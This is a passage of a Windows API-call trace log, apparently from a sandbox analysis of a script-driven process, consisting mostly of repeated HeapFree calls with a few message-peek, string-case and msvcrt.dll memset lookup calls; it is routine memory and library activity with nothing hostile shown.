CharLowerBuffW (in: lpsz="byte[72293]", cchLength=0xb | out: lpsz="byte[72293]") returned 0xb [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0181.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0181.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0181.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0181.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0181.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0181.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.133] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.133] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.134] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.135] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0181.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0181.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.135] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.136] FreeLibrary (hLibModule=0x75c90000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0181.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0181.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0181.138] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.138] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0181.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0181.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.141] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0181.141] HeapFree (in: hHeap=0x8a0000, 